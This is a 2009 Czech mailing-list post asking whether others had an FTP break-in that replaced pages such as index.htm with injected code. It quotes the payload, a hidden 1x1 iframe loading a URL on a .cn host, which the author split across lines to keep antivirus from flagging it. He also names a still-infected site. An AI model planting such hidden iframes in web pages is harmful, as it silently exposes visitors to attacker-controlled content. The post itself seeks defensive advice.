ftp hack

Jan Volešák volesak na aristia.cz
Čtvrtek Duben 9 14:36:15 CEST 2009

Dobrý den,
mohu se optat, zda se Vám náhodou nepřihodil ftp hack s nahrazením stránek main.htm, index.htm....stringem podobným tomuto:
<iframe src="
http://
cut
lot.cn/in.cgi?income50
" width=1
height=1 style="visibility: hidden
"></iframe>

Je to schválně narušeno znakem Enter aby to nepožraly antiviry

POZOR, ten iframe je tam aktivní! Neklikejte pokud nemáte nějaký antivirus. Zbytečně jim naklikáte prachy :)
Je to vidět např. na stránce: http://www.streleckarevue.cz/
POZOR, ten iframe je tam aktivní! Neklikejte pokud nemáte nějaký antivirus. Zbytečně jim naklikáte prachy :)

Jestli ano, jak se to přihodilo a jak jste to odstranili? Mě osobně se to nestalo. Ale zajímalo by mě to
Díky
Honza Volešák